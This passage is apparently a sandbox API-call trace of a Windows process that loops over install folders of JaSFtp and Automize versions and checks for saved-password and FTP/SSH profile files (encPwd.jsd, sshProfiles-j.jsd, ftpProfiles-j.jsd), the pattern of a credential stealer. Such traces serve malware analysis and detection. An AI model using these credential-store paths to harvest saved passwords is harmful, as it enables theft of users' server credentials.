param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0314.162] GetProcessHeap () returned 0x780000 [0314.162] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.162] GetProcessHeap () returned 0x780000 [0314.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.165] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.166] GetProcessHeap () returned 0x780000 [0314.166] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.166] GetProcessHeap () returned 0x780000 [0314.166] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.171] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.172] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 42 [0314.172] GetProcessHeap () returned 0x780000 [0314.172] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x58) returned 0x798dd8 [0314.173] GetProcessHeap () returned 0x780000 [0314.173] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.175] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 0 [0314.175] GetProcessHeap () returned 0x780000 [0314.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.176] GetProcessHeap () returned 0x780000 [0314.176] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.177] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.178] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 63 [0314.179] GetProcessHeap () returned 0x780000 [0314.179] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.179] GetProcessHeap () returned 0x780000 [0314.179] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.181] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.181] GetProcessHeap () returned 0x780000 [0314.182] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.182] GetProcessHeap () returned 0x780000 [0314.182] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.197] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.198] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0314.198] GetProcessHeap () returned 0x780000 [0314.198] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79a2e8 [0314.198] GetProcessHeap () returned 0x780000 [0314.199] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.201] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.201] GetProcessHeap () returned 0x780000 [0314.202] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.202] GetProcessHeap () returned 0x780000 [0314.202] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.204] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.205] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 43 [0314.205] GetProcessHeap () returned 0x780000 [0314.205] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.205] GetProcessHeap () returned 0x780000 [0314.206] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.208] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 0 [0314.208] GetProcessHeap () returned 0x780000 [0314.209] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.209] GetProcessHeap () returned 0x780000 [0314.209] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.210] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.211] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.211] GetProcessHeap () returned 0x780000 [0314.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.212] GetProcessHeap () returned 0x780000 [0314.212] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.213] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.214] GetProcessHeap () returned 0x780000 [0314.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.216] GetProcessHeap () returned 0x780000 [0314.216] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.217] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.218] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.218] GetProcessHeap () returned 0x780000 [0314.218] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.218] GetProcessHeap () returned 0x780000 [0314.220] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.221] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.221] GetProcessHeap () returned 0x780000 [0314.222] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.222] GetProcessHeap () returned 0x780000 [0314.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.223] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.225] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 43 [0314.225] GetProcessHeap () returned 0x780000 [0314.225] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.225] GetProcessHeap () returned 0x780000 [0314.226] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.228] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 0 [0314.228] GetProcessHeap () returned 0x780000 [0314.228] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.229] GetProcessHeap () returned 0x780000 [0314.229] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.236] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.237] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.237] GetProcessHeap () returned 0x780000 [0314.237] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.237] GetProcessHeap () returned 0x780000 [0314.238] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.239] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.239] GetProcessHeap () returned 0x780000 [0314.239] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.239] GetProcessHeap () returned 0x780000 [0314.239] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.240] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.241] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.241] GetProcessHeap () returned 0x780000 [0314.241] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.241] GetProcessHeap () returned 0x780000 [0314.241] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.242] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.242] GetProcessHeap () returned 0x780000 [0314.243] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.243] GetProcessHeap () returned 0x780000 [0314.243] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.243] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.244] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 43 [0314.244] GetProcessHeap () returned 0x780000 [0314.244] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5a) returned 0x798dd8 [0314.244] GetProcessHeap () returned 0x780000 [0314.245] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.246] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 0 [0314.246] GetProcessHeap () returned 0x780000 [0314.247] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.247] GetProcessHeap () returned 0x780000 [0314.247] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.247] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.248] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 64 [0314.248] GetProcessHeap () returned 0x780000 [0314.248] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.248] GetProcessHeap () returned 0x780000 [0314.249] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.249] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.250] GetProcessHeap () returned 0x780000 [0314.250] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.250] GetProcessHeap () returned 0x780000 [0314.250] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.251] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.251] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0314.251] GetProcessHeap () returned 0x780000 [0314.252] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79a2e8 [0314.252] GetProcessHeap () returned 0x780000 [0314.252] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.253] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.253] GetProcessHeap () returned 0x780000 [0314.253] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.253] GetProcessHeap () returned 0x780000 [0314.253] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.254] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.255] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 44 [0314.255] GetProcessHeap () returned 0x780000 [0314.255] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x798dd8 [0314.255] GetProcessHeap () returned 0x780000 [0314.255] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.256] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 0 [0314.256] GetProcessHeap () returned 0x780000 [0314.257] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.257] GetProcessHeap () returned 0x780000 [0314.257] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.257] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.258] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 65 [0314.258] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.259] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.260] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.260] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.260] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.261] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.262] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0314.262] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.263] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.264] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.264] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.264] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.265] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.266] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 44 [0314.266] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x798dd8 [0314.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.267] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 0 [0314.268] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.268] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.269] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.270] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 65 [0314.270] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.270] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.271] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.272] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.272] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.273] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.274] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0314.274] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.274] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.275] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.276] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.276] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.282] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.283] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 44 [0314.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x798dd8 [0314.284] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.284] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.285] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 0 [0314.285] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.285] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.286] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.287] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 65 [0314.287] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.287] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.288] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.288] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.288] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.289] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.289] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0314.289] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.290] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.291] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.291] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.292] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.293] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 44 [0314.293] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x798dd8 [0314.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.294] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 0 [0314.294] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.294] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.295] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.296] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 65 [0314.296] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.296] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.297] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.297] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.297] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.298] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.298] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0314.298] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.299] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.300] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.300] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.300] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f64) returned 0x79b318 [0314.301] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.301] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 44 [0314.301] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x5c) returned 0x798dd8 [0314.302] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.303] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 0 [0314.303] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.303] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.304] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.304] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 65 [0314.304] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.305] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.306] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0314.306] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.306] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f8e) returned 0x79b318 [0314.307] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.307] wvsprintfW (in: param_1=0x79b318, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0314.307] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x86) returned 0x79a2e8 [0314.308] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.309] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0314.309] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.309] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.310] LoadLibraryW (lpLibFileName="SHELL32") returned 